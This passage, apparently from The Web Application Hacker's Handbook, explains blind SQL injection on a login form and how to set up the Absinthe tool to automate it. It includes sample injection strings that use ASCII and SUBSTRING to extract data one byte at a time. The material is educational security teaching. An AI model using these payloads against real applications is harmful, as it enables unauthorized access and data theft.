The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

In the first case, the application will log you in as the admin user. In the sec-

ond case, the login attempt will fail, because the 

1=2

condition is always false.

You can leverage this control of the application’s behavior as a means of infer-

ring the truth or falsehood of arbitrary conditions within the database itself.

For example, using the 

ASCII

and 

SUBSTRING

functions described previously,

you can test whether a specific character of a captured string has a specific

value. For example, submitting this piece of input will log you in as the admin

user, because the condition tested is true:

admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 65--

Submitting the following input, however, will result in a failed login,

because the condition tested is false: 

admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 66--

By submitting a large number of such queries, cycling through the range of

likely ASCII codes for each character until a hit occurs, you can extract the

entire string, one byte at a time.

Absinthe

Performing this inference-based attack manually would be extremely tedious

and time-consuming, requiring numerous requests for every single byte of

retrieved data. Fortunately, there are various ways in which you can automate

and parallelize the attack, to extract a large amount of information in a rela-

tively short period of time. An excellent tool that you can use to perform this

task is Absinthe.

Absinthe is not a point-and-click tool. To use it effectively, you need to fully

understand the SQL injection flaw you are exploiting, and have reached the

point where you can supply crafted input that affects the application’s

response in some detectable way.

The first step is to configure Absinthe with all the information required to

perform the attack. This includes:

■■

The URL and request method.

■■

The type of database being targeted, so that Absinthe can retrieve the

relevant meta-information once the attack is underway.

■■

The parameters to the request, and whether each is injectable.

■■

Any further options to fine-tune the attack. If necessary, Absinthe can

append a specified string at the end of each injected payload and can

add the comment character, to ensure that the resulting modified query

is syntactically valid. 

Download 5,76 Mb.

Do'stlaringiz bilan baham: